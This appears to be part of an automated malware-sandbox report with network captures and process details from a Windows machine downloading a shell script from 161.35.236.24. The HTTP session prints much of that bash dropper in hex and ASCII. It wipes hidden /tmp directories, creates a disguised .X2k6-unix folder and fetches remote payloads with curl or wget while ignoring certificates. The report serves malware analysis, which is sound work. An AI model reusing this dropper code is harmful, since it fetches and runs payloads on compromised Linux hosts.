                Nov 29, 2022 16:35:03.336733103 CET8.8.8.8192.168.2.60x17ceNo error (0)www.google.com172.217.168.36A (IP address)IN (0x0001)false
                Nov 29, 2022 16:36:03.469834089 CET8.8.8.8192.168.2.60xe98dNo error (0)www.google.com172.217.168.36A (IP address)IN (0x0001)false
                • clients2.google.com
                • accounts.google.com
                • 161.35.236.24
                Session IDSource IPSource PortDestination IPDestination PortProcess
                0192.168.2.649714142.250.203.110443C:\Program Files\Google\Chrome\Application\chrome.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                1192.168.2.649715172.217.168.45443C:\Program Files\Google\Chrome\Application\chrome.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                2192.168.2.649717161.35.236.2480C:\Program Files\Google\Chrome\Application\chrome.exe
                TimestampkBytes transferredDirectionData
                Nov 29, 2022 16:35:00.988480091 CET435OUTGET /tddwrt7s.sh HTTP/1.1
                Host: 161.35.236.24
                Connection: keep-alive
                Upgrade-Insecure-Requests: 1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                Accept-Encoding: gzip, deflate
                Accept-Language: en-US,en;q=0.9
                Nov 29, 2022 16:35:01.170974016 CET441INHTTP/1.1 200 OK
                Server: nginx/1.18.0 (Ubuntu)
                Date: Tue, 29 Nov 2022 15:35:01 GMT
                Content-Type: application/octet-stream
                Content-Length: 1971
                Last-Modified: Mon, 28 Nov 2022 15:31:13 GMT
                Connection: keep-alive
                ETag: "6384d441-7b3"
                Accept-Ranges: bytes
                Data Raw: 23 21 2f 62 69 6e 2f 62 61 73 68 0a 69 66 20 5b 20 2d 64 20 22 2f 74 6d 70 2f 2e 58 32 6b 36 2d 75 6e 69 78 2f 2e 72 73 79 6e 63 2f 63 22 20 5d 3b 20 74 68 65 6e 0a 20 20 20 20 20 20 20 20 63 61 74 20 2f 74 6d 70 2f 2e 58 32 6b 36 2d 75 6e 69 78 2f 2e 72 73 79 6e 63 2f 69 6e 69 74 61 6c 6c 20 7c 20 62 61 73 68 20 32 3e 31 26 0a 20 20 20 20 20 20 20 20 65 78 69 74 20 30 0a 65 6c 73 65 0a 20 20 20 20 20 20 20 20 63 64 20 2f 74 6d 70 0a 20 20 20 20 20 20 20 20 72 6d 20 2d 72 66 20 2e 73 73 68 0a 20 20 20 20 20 20 20 20 72 6d 20 2d 72 66 20 2e 6d 6f 75 6e 74 66 73 0a 20 20 20 20 20 20 20 20 72 6d 20 2d 72 66 20 2e 58 32 2a 0a 20 20 20 20 20 20 20 20 72 6d 20 2d 72 66 20 2e 58 33 2a 0a 09 72 6d 20 2d 72 66 20 2e 58 31 39 2d 75 6e 69 78 2a 0a 20 20 20 20 20 20 20 20 72 6d 20 2d 72 66 20 2e 58 32 31 2d 75 6e 69 78 2a 0a 20 20 20 20 20 20 20 20 72 6d 20 2d 72 66 20 2e 58 32 32 2d 75 6e 69 78 2a 0a 20 20 20 20 20 20 20 20 72 6d 20 2d 72 66 20 2e 58 32 33 2d 75 6e 69 78 0a 20 20 20 20 20 20 20 20 72 6d 20 2d 72 66 20 2e 58 32 35 2d 75 6e 69 78 0a 20 20 20 20 20 20 20 20 6d 6b 64 69 72 20 2e 58 32 6b 36 2d 75 6e 69 78 0a 20 20 20 20 20 20 20 20 63 64 20 2e 58 32 6b 36 2d 75 6e 69 78 0a 20 20 20 20 20 20 20 20 52 41 4e 47 45 3d 36 0a 20 20 20 20 20 20 20 20 73 3d 24 52 41 4e 44 4f 4d 0a 20 20 20 20 20 20 20 20 6c 65 74 20 22 73 20 25 3d 20 24 52 41 4e 47 45 22 0a 69 66 20 5b 20 24 73 20 3d 3d 20 30 20 5d 3b 20 74 68 65 6e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 6c 65 65 70 20 24 5b 20 28 20 24 52 41 4e 44 4f 4d 20 25 20 35 30 30 20 29 20 20 2b 20 31 35 20 5d 73 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 75 72 6c 20 2d 4f 20 2d 66 20 24 31 20 7c 7c 20 77 67 65 74 20 2d 77 20 33 20 2d 54 20 31 30 20 2d 74 20 32 20 2d 71 20 2d 2d 6e 6f 2d 63 68 65 63 6b 2d 63 65 72 74 69 66 69 63 61 74 65 20 24 31 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 69 0a 69 66 20 5b 20 24 73 20 3d 3d 20 31 20 5d 3b 20 74 68 65 6e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 6c 65 65 70 20 24 5b 20 28 20 24 52 41 4e 44 4f 4d 20 25 20 35 30 30 20 29 20 20 2b 20 35 20 5d 73 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 75 72 6c 20 2d 4f 20 2d 66 20 24 32 20 7c 7c 20 77 67 65 74 20 2d 77 20 33 20 2d 54 20 31 30 20 2d 74 20 32 20 2d 71 20 2d 2d 6e 6f 2d 63 68 65 63 6b 2d 63 65 72 74 69 66 69 63 61 74 65 20 24 32 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 69 0a 69 66 20 5b 20 24 73 20 3d 3d 20 32 20 5d 3b 20 74 68 65 6e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 6c 65 65 70 20 24 5b 20 28 20 24 52 41 4e 44 4f 4d 20 25 20 35 30 30 20 29 20 20 2b 20 32 35 20 5d 73 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 75 72 6c 20 2d 4f 20 2d 66 20 24 33 20 7c 7c 20 77 67 65 74 20 2d 77 20 33 20 2d 54 20 31 30 20 2d 74 20 32 20 2d 71 20 2d 2d 6e 6f 2d 63 68 65 63 6b 2d 63 65 72 74 69 66 69 63 61 74 65 20 24 33 0a 20 20 20 20 20 20 20 20 20 20 20 20
                Data Ascii: #!/bin/bashif [ -d "/tmp/.X2k6-unix/.rsync/c" ]; then cat /tmp/.X2k6-unix/.rsync/initall | bash 2>1& exit 0else cd /tmp rm -rf .ssh rm -rf .mountfs rm -rf .X2* rm -rf .X3*rm -rf .X19-unix* rm -rf .X21-unix* rm -rf .X22-unix* rm -rf .X23-unix rm -rf .X25-unix mkdir .X2k6-unix cd .X2k6-unix RANGE=6 s=$RANDOM let "s %= $RANGE"if [ $s == 0 ]; then sleep $[ ( $RANDOM % 500 ) + 15 ]s curl -O -f $1 || wget -w 3 -T 10 -t 2 -q --no-check-certificate $1 fiif [ $s == 1 ]; then sleep $[ ( $RANDOM % 500 ) + 5 ]s curl -O -f $2 || wget -w 3 -T 10 -t 2 -q --no-check-certificate $2 fiif [ $s == 2 ]; then sleep $[ ( $RANDOM % 500 ) + 25 ]s curl -O -f $3 || wget -w 3 -T 10 -t 2 -q --no-check-certificate $3
                Nov 29, 2022 16:35:01.171031952 CET442INData Raw: 20 20 20 20 66 69 0a 69 66 20 5b 20 24 73 20 3d 3d 20 33 20 5d 3b 20 74 68 65 6e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 6c 65 65 70 20 24 5b 20 28 20 24 52 41 4e 44 4f 4d 20 25 20 35 30 30 20 29 20 20 2b 20
                Data Ascii: fiif [ $s == 3 ]; then sleep $[ ( $RANDOM % 500 ) + 10 ]s curl -O -f $4 || wget -w 3 -T 10 -t 2 -q --no-check-certificate $4 fiif [ $s == 4 ]; then
                Nov 29, 2022 16:35:46.184499979 CET476OUTData Raw: 00
                Data Ascii:


                Session IDSource IPSource PortDestination IPDestination PortProcess
                3192.168.2.649718161.35.236.2480C:\Program Files\Google\Chrome\Application\chrome.exe
                TimestampkBytes transferredDirectionData
                Nov 29, 2022 16:35:46.106399059 CET476OUTData Raw: 00
                Data Ascii:


                Session IDSource IPSource PortDestination IPDestination PortProcess
                0192.168.2.649714142.250.203.110443C:\Program Files\Google\Chrome\Application\chrome.exe
                TimestampkBytes transferredDirectionData
                2022-11-29 15:35:00 UTC0OUTGET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1
                Host: clients2.google.com
                Connection: keep-alive
                X-Goog-Update-Interactivity: fg
                X-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda
                X-Goog-Update-Updater: chromecrx-104.0.5112.81
                Sec-Fetch-Site: none
                Sec-Fetch-Mode: no-cors
                Sec-Fetch-Dest: empty
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                Accept-Encoding: gzip, deflate, br
                Accept-Language: en-US,en;q=0.9
                2022-11-29 15:35:00 UTC1INHTTP/1.1 200 OK
                Content-Security-Policy: script-src 'report-sample' 'nonce-NYZIZ9x7Z63pGmrAizUJ1Q' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1
                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                Pragma: no-cache
                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                Date: Tue, 29 Nov 2022 15:35:00 GMT
                Content-Type: text/xml; charset=UTF-8
                X-Daynum: 5811
                X-Daystart: 27300
                X-Content-Type-Options: nosniff
                X-Frame-Options: SAMEORIGIN
                X-XSS-Protection: 1; mode=block
                Server: GSE
                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                Accept-Ranges: none
                Vary: Accept-Encoding
                Connection: close
                Transfer-Encoding: chunked
                2022-11-29 15:35:00 UTC2INData Raw: 32 63 39 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 67 75 70 64 61 74 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 70 64 61 74 65 32 2f 72 65 73 70 6f 6e 73 65 22 20 70 72 6f 74 6f 63 6f 6c 3d 22 32 2e 30 22 20 73 65 72 76 65 72 3d 22 70 72 6f 64 22 3e 3c 64 61 79 73 74 61 72 74 20 65 6c 61 70 73 65 64 5f 64 61 79 73 3d 22 35 38 31 31 22 20 65 6c 61 70 73 65 64 5f 73 65 63 6f 6e 64 73 3d 22 32 37 33 30 30 22 2f 3e 3c 61 70 70 20 61 70 70 69 64 3d 22 6e 6d 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 22 20 63 6f 68 6f 72 74 3d 22 31 3a 3a 22 20 63 6f 68 6f 72 74 6e 61 6d 65 3d 22 22
                Data Ascii: 2c9<?xml version="1.0" encoding="UTF-8"?><gupdate xmlns="http://www.google.com/update2/response" protocol="2.0" server="prod"><daystart elapsed_days="5811" elapsed_seconds="27300"/><app appid="nmmhkkegccagdldgiimedpiccmgmieda" cohort="1::" cohortname=""
                2022-11-29 15:35:00 UTC2INData Raw: 6d 78 76 59 6e 4d 76 4e 7a 49 30 51 55 46 58 4e 56 39 7a 54 32 52 76 64 55 77 79 4d 45 52 45 53 45 5a 47 56 6d 4a 6e 51 51 2f 31 2e 30 2e 30 2e 36 5f 6e 6d 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 2e 63 72 78 22 20 66 70 3d 22 31 2e 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 68 61 73 68 5f 73 68 61 32 35 36 3d 22 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 70 72 6f 74 65 63 74 65 64 3d 22 30 22 20 73 69
                Data Ascii: mxvYnMvNzI0QUFXNV9zT2RvdUwyMERESEZGVmJnQQ/1.0.0.6_nmmhkkegccagdldgiimedpiccmgmieda.crx" fp="1.81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" hash_sha256="81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" protected="0" si
                2022-11-29 15:35:00 UTC2INData Raw: 30 0d 0a 0d 0a
                Data Ascii: 0


                Session IDSource IPSource PortDestination IPDestination PortProcess
                1192.168.2.649715172.217.168.45443C:\Program Files\Google\Chrome\Application\chrome.exe
                TimestampkBytes transferredDirectionData
                2022-11-29 15:35:00 UTC0OUTPOST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1
                Host: accounts.google.com
                Connection: keep-alive
                Content-Length: 1
                Origin: https://www.google.com
                Content-Type: application/x-www-form-urlencoded
                Sec-Fetch-Site: none
                Sec-Fetch-Mode: no-cors
                Sec-Fetch-Dest: empty
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                Accept-Encoding: gzip, deflate, br
                Accept-Language: en-US,en;q=0.9
                Cookie: __Secure-ENID=6.SE=Md0Ynyf9ahpkx1CxTGF0vY434NJ6ymH-gDI2Tl5Ly-NQYGPjnNfggtiFRMAwx4JRDOC_gavEPcD5cTBJzUgtbJobmBEuJ8xi2UuotxvOZgApoqSIg1b0RP47U08XG8Bz_SExSzKy0ETSsajbToDlYyFsxfI93p7AyRAd-OeIBA0; CONSENT=PENDING+070
                2022-11-29 15:35:00 UTC1OUTData Raw: 20
                Data Ascii:
                2022-11-29 15:35:00 UTC2INHTTP/1.1 200 OK
                Content-Type: application/json; charset=utf-8
                Access-Control-Allow-Origin: https://www.google.com
                Access-Control-Allow-Credentials: true
                X-Content-Type-Options: nosniff
                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                Pragma: no-cache
                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                Date: Tue, 29 Nov 2022 15:35:00 GMT
                Strict-Transport-Security: max-age=31536000; includeSubDomains
                Content-Security-Policy: script-src 'report-sample' 'nonce-C38WHQ0p2HHA7j4r4MJb5w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/IdentityListAccountsHttp/cspreport;worker-src 'self'
                Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/IdentityListAccountsHttp/cspreport/allowlist
                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/IdentityListAccountsHttp/cspreport
                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-platform=*, ch-ua-platform-version=*
                Cross-Origin-Opener-Policy: same-origin
                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                Server: ESF
                X-XSS-Protection: 0
                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                Accept-Ranges: none
                Vary: Accept-Encoding
                Connection: close
                Transfer-Encoding: chunked
                2022-11-29 15:35:00 UTC4INData Raw: 31 31 0d 0a 5b 22 67 61 69 61 2e 6c 2e 61 2e 72 22 2c 5b 5d 5d 0d 0a
                Data Ascii: 11["gaia.l.a.r",[]]
                2022-11-29 15:35:00 UTC4INData Raw: 30 0d 0a 0d 0a
                Data Ascii: 0


                Click to jump to process

                Click to jump to process

                Click to dive into process behavior distribution

                Click to jump to process

                Target ID:0
                Start time:16:34:55
                Start date:29/11/2022
                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                Wow64 process (32bit):false
                Commandline:C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
                Imagebase:0x7ff6f9750000
                File size:2851656 bytes
                MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low

                Target ID:1
                Start time:16:34:57
                Start date:29/11/2022
                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                Wow64 process (32bit):false
                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1788 --field-trial-handle=1736,i,4749182345959288231,17743984452233168257,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8
                Imagebase:0x7ff6f9750000
                File size:2851656 bytes
                MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low

                Target ID:2
                Start time:16:34:58
                Start date:29/11/2022
                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                Wow64 process (32bit):false
                Commandline:C:\Program Files\Google\Chrome\Application\chrome.exe" "http://161.35.236.24/tddwrt7s.sh
                Imagebase:0x7ff6f9750000
                File size:2851656 bytes
                MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low

                No disassembly